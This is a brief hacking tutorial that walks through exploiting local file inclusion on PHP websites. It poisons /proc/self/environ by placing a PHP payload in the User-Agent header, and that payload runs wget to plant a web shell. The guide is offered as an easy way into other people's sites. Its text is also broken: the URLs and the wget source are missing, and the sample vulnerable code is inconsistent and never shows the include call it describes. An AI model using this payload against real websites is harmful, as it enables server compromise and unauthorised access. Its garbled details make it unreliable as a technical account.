Skip to main content

Hacking Websites via LFI (Simple, Short and easy)

 1. Introduction

 2. /proc/self/environ
 3. PHP injection
 4. Accessing the shell

1. Introduction

Remember LFI? This is a tutorial on how to get the shell on the website with a site vulnerable to LFI.

Here is the example of a code that is vulnerable to LFI:

// LFI Vulnerable Code
$redirect = $_GET[redirect];

It is vulnerable because $redirect is not sanitized, therefor include($redirect); will read off $_GET[page];.

Here is a example of LFI on Unix (very old): (Unix) (Linux) (FreeBSD)

2. proc/self/environ

To check if it is vulnerable, we enter this in the ../ part:

If you get something like DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc... That means it is vulnerable.

If you get only a blank page, it isn't vulnerable.

3. PHP Injection
Now, let's access it and use Tamper Data to change the user agent to this:
<?system('wget -O gonullyourself.php');?>
Now, submit the request.

Our command will be executed.

4. Accessing the shell

To check if the command got executed, we will enter something like this:

If our shell is there, the command was successfully executed.

Easy :) Isn't it?